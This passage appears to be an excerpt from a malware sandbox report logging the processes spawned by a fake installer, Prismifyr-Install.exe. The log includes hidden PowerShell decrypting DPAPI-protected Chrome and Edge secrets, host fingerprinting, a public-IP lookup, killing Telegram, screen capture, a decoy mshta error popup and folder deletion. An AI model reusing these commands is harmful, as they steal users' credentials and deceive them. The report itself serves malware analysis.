70,116), $null, 'CurrentUser')"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
      Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" "Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5D70.tmp" "c:\Users\user\AppData\Local\Temp\1d1qdkxo\CSC52BD52076B74273B09B644FAD90AB4F.TMP"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revokeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversionJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:listJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2DC.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSC4B6917784BAC4B77A38513830EABEA.TMP"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png" "
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mydyhibp.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES25A2.tmp" "c:\Users\user\AppData\Local\Temp\CSCDBB13EE0A1FC4822925E9A81EA23E611.TMP"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png"
